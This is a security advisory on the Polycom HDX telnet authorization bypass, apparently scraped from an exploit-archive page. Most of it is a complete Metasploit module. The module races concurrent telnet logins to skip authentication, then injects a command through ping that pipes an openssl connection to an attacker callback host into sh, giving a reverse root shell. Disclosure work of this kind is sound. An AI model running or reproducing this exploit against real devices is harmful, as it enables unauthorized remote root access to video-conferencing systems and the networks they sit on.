扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 |
======================================================================== = Polycom HDX Telnet Authorization Bypass = = Vendor Website: =www.polycom.com = = Affected Version: = Polycom HDX devices: = All releases prior to and including Commercial 3.0.5 = = Public disclosure on January 18, 2013 = ======================================================================== == Overview == The Polycom HDX is a series of telecommunication and video devices. The telnet component of Polycom HDX video endpoint devices is vulnerable to an authorization bypass when multiple simultaneous connections are repeatedly made to the service, allowing remote network attackers to gain full access to a Polycom command prompt without authentication. Versions prior to 3.0.4 also contain OS command injection in the ping command which can be used to escape the telnet prompt and execute arbitrary commands as root. == Solution == Until a software solution is released, Polycom recommends administrators disable telnet on their HDX unit. == Credit == Discovered and advised to Polycom Inc., 2012 by Paul Haas of Security-Assessment.com. == About Security-Assessment.com == Security-Assessment.com is a leading team of Information Security consultants specializing in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognized companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Web: www.security-assessment.com Email: info@security-assessment.com == Exploitation == The following Metasploit module can be used to reproduce the issue: ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'Polycom Command Shell Authorization Bypass', 'Alias' => 'psh_auth_bypass', 'Author' => [ 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>' ], 'DisclosureDate' => 'Jan 18 2013', 'Description' => %q{ The login component of the Polycom Command Shell on Polycom HDX Video End Points running software versions 3.0.5 and earlier is vulnerable to an authorization bypass when simultaneous connections are made to the service, allowing remote network attackers to gain access to a sandboxed telnet prompt without authentication. Versions prior to 3.0.4 contain OS command injection in the ping command which can be used to execute arbitrary commands as root. }, 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ], [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ] ], 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Targets' => [ [ "Universal", {} ] ], 'Payload' => { 'Space' => 8000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd',}, }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' }, 'DefaultTarget' => 0 )) register_options( [ Opt::RHOST(), Opt::RPORT(23), OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]), OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ]) ],self.class) register_advanced_options( [ OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]), OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100]) ], self.class) end def check connect sock.put(Rex::Text.rand_text_alpha(rand(5)+1) + "\n") ::IO.select(nil, nil, nil, 1) res = sock.get disconnect if !(res and res.length > 0) return Exploit::CheckCode::Safe end if (res =~ /Welcome to ViewStation/) return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit # Keep track of results (successful connections) results = [] # Random string for password password = Rex::Text.rand_text_alpha(rand(5)+1) # Threaded login checker max_threads = datastore['THREADS'] cur_threads = [] # Try up to 100 times just to be sure queue = [*(1 .. datastore['MAX_CONNECTIONS'])] print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ") while(queue.length > 0) while(cur_threads.length < max_threads) # We can stop if we get a valid login break if results.length > 0 # keep track of how many attempts we've made item = queue.shift # We can stop if we reach max tries break if not item t = Thread.new(item) do |count| sock = connect sock.put(password + "\n") res = sock.get while res.length > 0 break if results.length > 0 # Post-login Polycom banner means success if (res =~ /Polycom/) results << sock break # bind error indicates bypass is working elsif (res =~ /bind/) sock.put(password + "\n") #Login error means we need to disconnect elsif (res =~ /failed/) break #To many connections means we need to disconnect elsif (res =~ /Error/) break end res = sock.get end end cur_threads << t end # We can stop if we get a valid login break if results.length > 0 # Add to a list of dead threads if we're finished cur_threads.each_index do |ti| t = cur_threads[ti] if not t.alive? cur_threads[ti] = nil end end # Remove any dead threads from the set cur_threads.delete(nil) ::IO.select(nil, nil, nil, 0.25) end # Clean up any remaining threads cur_threads.each {|sock| sock.kill } if results.length > 0 print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw") do_payload(results[0]) else print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable") end end def do_payload(sock) # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) # Start a listener start_listener(true) # Figure out the port we picked cbport = self.service.getsockname[2] # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128 cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n" sock.put(cmd) # Give time for our command to be queued and executed 1.upto(5) do ::IO.select(nil, nil, nil, 1) break if session_created? end end def stage_final_payload(cli) print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") cli.put(payload.encoded + "\n") end def start_listener(ssl = false) comm = datastore['ListenerComm'] if comm == "local" comm = ::Rex::Socket::Comm::Local else comm = nil end self.service = Rex::Socket::TcpServer.create( 'LocalPort' => datastore['CBPORT'], 'SSL' => ssl, 'SSLCert' => datastore['SSLCert'], 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self, }) self.service.on_client_connect_proc = Proc.new { |client| stage_final_payload(client) } # Start the listening service self.service.start end # Shut down any running services def cleanup super if self.service print_status("Shutting down payload stager listener...") begin self.service.deref if self.service.kind_of?(Rex::Service) if self.service.kind_of?(Rex::Socket) self.service.close self.service.stop end self.service = nil rescue ::Exception end end end # Accessor for our TCP payload stager attr_accessor :service end |
体验盒子
